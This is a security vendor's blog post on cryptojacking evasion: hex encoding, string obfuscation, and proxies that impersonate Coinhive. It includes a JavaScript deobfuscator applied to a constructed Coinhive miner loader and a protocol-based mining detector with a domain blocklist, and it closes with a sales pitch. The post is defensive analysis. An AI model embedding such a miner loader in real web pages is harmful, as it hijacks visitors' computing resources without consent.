In our last article on cryptojacking, we discussed what cryptojacking is and how malicious actors hijack your computing resources to mine cryptocurrency. Since then, the “bad guys” have been evolving their in-browser miners to avoid detection and reap more reward from unsuspecting users. The techniques we are seeing include encoding, obfuscation, and proxies. None of them is new, but until recently they had not been applied to cryptojacking. The “good guys” at Rubica specialize in detecting and preventing this sort of malicious activity.
Encoding is used in computing to transform data for transport between systems. It is not meant to keep data secret, but it still defeats signature-based detection: a signature written for the plain-text script does not match the encoded bytes, so the script passes unless the detector decodes it first. At Rubica, we have observed actors hex encoding their malicious mining scripts, like the one depicted below:
When decoded, this part of the script is human readable and looks like this:
Now, you may be thinking “that was easy to decode”, but encoding can be used in tandem with obfuscation to produce code like this:
Obfuscation is intended to make data unreadable, or at least hard to understand. It makes an analyst’s job harder because reverse engineering the code back into a human-readable form is time consuming. In this case, we were able to use a debugger to step past a layer of obfuscation and find some interesting indicators: the script has to decode its own strings before it can run in the browser, so breaking on it after that point exposes the values it was built to hide. This brings us to proxies, servers with specialized software that forward client requests to other servers.
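The two layers just described, hex encoding and string obfuscation, can be peeled off mechanically once you know their shape. The JavaScript below is an added example written for this article; it is not Rubica’s tooling and not a script we observed. The sample loader it decodes is constructed, and its obfuscation pattern (a `_0x` string array read only through an accessor function called with hex indices) is an assumption modelled on common JavaScript obfuscators. It also shows why a naive content signature fails on the encoded form and matches only after decoding.

```javascript
// Added example, not Rubica's code: peel hex encoding and string-array
// obfuscation off a constructed miner loader, then extract indicators.
// The obfuscation pattern (a `_0x` string array read through an accessor
// function called with hex indices) is an assumption modelled on common
// JavaScript obfuscators. SAMPLE is constructed for illustration.

// Layer 1: every string in the array is hex-escaped
//   ("\x43\x6f\x69\x6e\x48\x69\x76\x65" is "CoinHive").
// Layer 2: the loader reaches those strings only through the accessor _0x2f9c.
const SAMPLE = String.raw`var _0x3e1a=['\x77\x73\x73\x3a\x2f\x2f\x6d\x69\x6e\x65\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x6e\x65\x74\x3a\x38\x38\x39\x32','\x43\x6f\x69\x6e\x48\x69\x76\x65','\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73','\x73\x74\x61\x72\x74'];
function _0x2f9c(i){return _0x3e1a[parseInt(i,16)];}
var pool=_0x2f9c('0x0');
var miner=new window[_0x2f9c('0x1')][_0x2f9c('0x2')]('a1b2c3d4e5f60718293a4b5c6d7e8f90',{throttle:0.3});
miner[_0x2f9c('0x3')]();`;

// A naive content signature of the kind encoding is meant to defeat (assumed).
const SIGNATURE = /CoinHive\.Anonymous\(/;
function matchesSignature(text) { return SIGNATURE.test(text); }

// Whole-script hex encoding: "766172" decodes to "var". ASCII only.
function hexToText(hex) {
  const clean = hex.replace(/\s+/g, '');
  let out = '';
  for (let i = 0; i + 1 < clean.length; i += 2) {
    out += String.fromCharCode(parseInt(clean.slice(i, i + 2), 16));
  }
  return out;
}
function textToHex(text) {
  return [...text].map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// Layer 1: "\x41"-style escapes inside string literals.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Layer 2: inline the string array. Find `var _0x..=[...]`, the accessor that
// indexes it, and replace every accessor call with the literal it returns.
function resolveStringArray(src) {
  const decl = src.match(/var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\];/);
  if (!decl) return src;
  const [declText, arrName, body] = decl;
  const table = body.split(',').map(s => s.trim().replace(/^'(.*)'$/, '$1'));
  const accRe = new RegExp(`function\\s+(_0x[0-9a-f]+)\\(\\w+\\)\\{return\\s+${arrName}\\[[^\\]]*\\];?\\}`);
  const acc = src.match(accRe);
  if (!acc) return src;
  const [accText, fnName] = acc;
  let out = src.replace(declText, '').replace(accText, '');
  const callRe = new RegExp(`${fnName}\\('?(0x[0-9a-f]+|\\d+)'?\\)`, 'g');
  out = out.replace(callRe, (_, idx) => JSON.stringify(table[parseInt(idx, idx.startsWith('0x') ? 16 : 10)]));
  // window["CoinHive"]["Anonymous"] reads better as window.CoinHive.Anonymous
  return out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1').trim();
}

function deobfuscate(src) {
  const text = /^[0-9a-fA-F\s]+$/.test(src) ? hexToText(src) : src;  // whole-script hex?
  return resolveStringArray(decodeHexEscapes(text));
}

// Indicators an analyst wants out of the readable script.
function extractIndicators(readable) {
  return {
    urls: readable.match(/\b(?:wss?|https?):\/\/[^\s'"]+/g) || [],
    // 32-character alphanumeric literal: the site-key shape (assumed) handed to the constructor
    siteKeys: [...readable.matchAll(/['"]([A-Za-z0-9]{32})['"]/g)].map(m => m[1]),
    minerApi: [...readable.matchAll(/\bCoinHive\.(\w+)\b/g)].map(m => m[1]),
  };
}

const readable = deobfuscate(SAMPLE);
console.log(readable);
console.log(extractIndicators(readable));
```

Running it prints the three-line loader in the clear (`var pool="wss://mine.example.net:8892";`, the `new window.CoinHive.Anonymous(...)` call with its 32-character key, and `miner.start();`) together with the extracted URL, key and API name. The signature does not fire on the raw sample or on a fully hex-encoded copy of it, and does fire on the decoded output, which is the practical reason a detector has to normalise before it matches.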
When mining cryptocurrency, miners connect to mining pools. A pool combines the processing power of many miners and so increases the likelihood that one of them completes a block in the blockchain. However, users are charged a fee to participate. In the case of Coinhive, a popular in-browser cryptocurrency mining service, that fee is roughly 30%. Since this is significantly higher than what other pools typically charge, we have observed malicious actors registering their own domains and running proxies that impersonate Coinhive: the in-browser miner connects to the actor’s proxy, which forwards the work to an alternate mining pool, and the 30% fee is avoided. This equates to slightly more money in the “bad guys’” pocket. It also means the miner never talks to a Coinhive domain, so any defense that only blocks those domains does not see it.
This is easy to do thanks to free guides on GitHub that show how to set up the infrastructure on hosting services like DigitalOcean. One guide Rubica found specifically shows users how to avoid AdBlock by changing Coinhive’s global variables:
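The proxy described above defeats any defense keyed on Coinhive’s domains, and the AdBlock trick defeats filters keyed on the miner’s script name and globals, but the proxy still has to relay the miner’s job and share traffic to whatever pool sits behind it. The JavaScript below is an added example written for this article; it is not Rubica’s detection logic and not code from the guides mentioned. It classifies captured WebSocket sessions by the protocol they speak rather than by hostname. The message shapes are an assumption modelled on stratum-style JSON pool protocols, the blocklist is assumed, and the three sessions are constructed, not captured traffic.

```javascript
// Added example, not Rubica's code: decide whether a captured WebSocket session
// is in-browser mining by the protocol it speaks, not by the hostname. A proxy
// that impersonates Coinhive swaps the domain and the pool behind it, but it
// still has to relay the miner's job/submit exchange, so that is what we match.
// Message shapes are an assumption modelled on stratum-style JSON pool
// protocols; all sessions below are constructed, not captured traffic.

const BLOCKLIST = new Set(['coinhive.com', 'coin-hive.com']);  // assumed domain list

const SESSIONS = [
  { // Miner talking to the real service: a hostname blocklist catches this one.
    url: 'wss://ws001.coinhive.com/proxy',
    messages: [
      { dir: 'out', text: '{"type":"auth","params":{"site_key":"a1b2c3d4e5f60718293a4b5c6d7e8f90","type":"anonymous"}}' },
      { dir: 'in',  text: '{"type":"authed","params":{"token":"","hashes":0}}' },
      { dir: 'in',  text: '{"type":"job","params":{"job_id":"1","blob":"0707e6bdfedc05a8b1c2d3e4f5061728","target":"b88d0600"}}' },
      { dir: 'out', text: '{"type":"submit","params":{"job_id":"1","nonce":"2a1f0c9e","result":"4f3e2d1c0b0a9988"}}' },
    ],
  },
  { // Same miner behind an actor-registered proxy domain: the blocklist misses it.
    url: 'wss://static-cdn.example.org/socket',
    messages: [
      { dir: 'out', text: '{"type":"auth","params":{"site_key":"a1b2c3d4e5f60718293a4b5c6d7e8f90","type":"anonymous"}}' },
      { dir: 'in',  text: '{"type":"authed","params":{"token":"","hashes":0}}' },
      { dir: 'in',  text: '{"type":"job","params":{"job_id":"7f","blob":"0707f1c3a9e805a8b1c2d3e4f5061728","target":"b88d0600"}}' },
      { dir: 'out', text: '{"type":"submit","params":{"job_id":"7f","nonce":"00b1c2d3","result":"1122334455667788"}}' },
      { dir: 'out', text: '{"type":"submit","params":{"job_id":"7f","nonce":"00b1c2e9","result":"8877665544332211"}}' },
      { dir: 'in',  text: '{"type":"job","params":{"job_id":"80","blob":"0707a2b3c4d505a8b1c2d3e4f5061728","target":"b88d0600"}}' },
      { dir: 'out', text: '{"type":"submit","params":{"job_id":"80","nonce":"5a5a5a5a","result":"abcdefabcdefabcd"}}' },
    ],
  },
  { // Benign: a build dashboard that also sends "job" messages, just not mining-shaped ones.
    url: 'wss://ci.example.com/events',
    messages: [
      { dir: 'in',  text: '{"type":"job","params":{"job_id":"nightly","status":"queued"}}' },
      { dir: 'out', text: '{"type":"subscribe","params":{"job_id":"nightly"}}' },
      { dir: 'in',  text: 'not json at all' },
    ],
  },
];

function hostOf(url) { return new URL(url).hostname; }

// Domain blocklist, matching the domain itself or any subdomain of it.
function onBlocklist(host) {
  return [...BLOCKLIST].some(d => host === d || host.endsWith('.' + d));
}
function hostnameVerdict(session) {
  return onBlocklist(hostOf(session.url)) ? 'mining' : 'clean';
}

// Protocol shape: the server issues jobs (hex blob + target + job_id) and the
// client answers with submits that reference job_ids the server actually issued.
// A "job" message without that shape (see the CI session) does not count.
function protocolVerdict(session) {
  const issued = new Set();
  let submits = 0;
  let siteKey = null;
  for (const { dir, text } of session.messages) {
    let msg;
    try { msg = JSON.parse(text); } catch { continue; }   // ignore non-JSON frames
    if (!msg || typeof msg !== 'object') continue;
    const p = msg.params || {};
    if (dir === 'out' && msg.type === 'auth' && typeof p.site_key === 'string') siteKey = p.site_key;
    if (dir === 'in' && msg.type === 'job' && /^[0-9a-f]+$/i.test(p.blob || '') && p.target && p.job_id) {
      issued.add(p.job_id);
    }
    if (dir === 'out' && msg.type === 'submit' && issued.has(p.job_id) && p.nonce) submits++;
  }
  return { verdict: issued.size > 0 && submits > 0 ? 'mining' : 'clean', jobs: issued.size, submits, siteKey };
}

function classify(session) {
  const proto = protocolVerdict(session);
  return {
    host: hostOf(session.url),
    byHostname: hostnameVerdict(session),
    byProtocol: proto.verdict,
    jobs: proto.jobs,
    submits: proto.submits,
    siteKey: proto.siteKey,
  };
}

for (const s of SESSIONS) console.log(classify(s));
```

The second session is the one the page is about: the hostname check reports it clean because the actor registered a domain of their own, while the protocol check reports mining because the job and submit exchange is unchanged. Renaming the miner’s globals to slip past AdBlock does not change that exchange either. In production you would add rate thresholds (submits per minute, session duration) before alerting, since other applications can legitimately speak a similar request and response pattern.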
As you can see, cyber criminals continually change their tactics, techniques, and procedures (TTPs) to bypass defenses. Without Rubica’s advanced cyber security defense measures, you are at high risk of becoming a victim. Contact the “good guys” at Rubica for more information about, and protection from, malicious mining.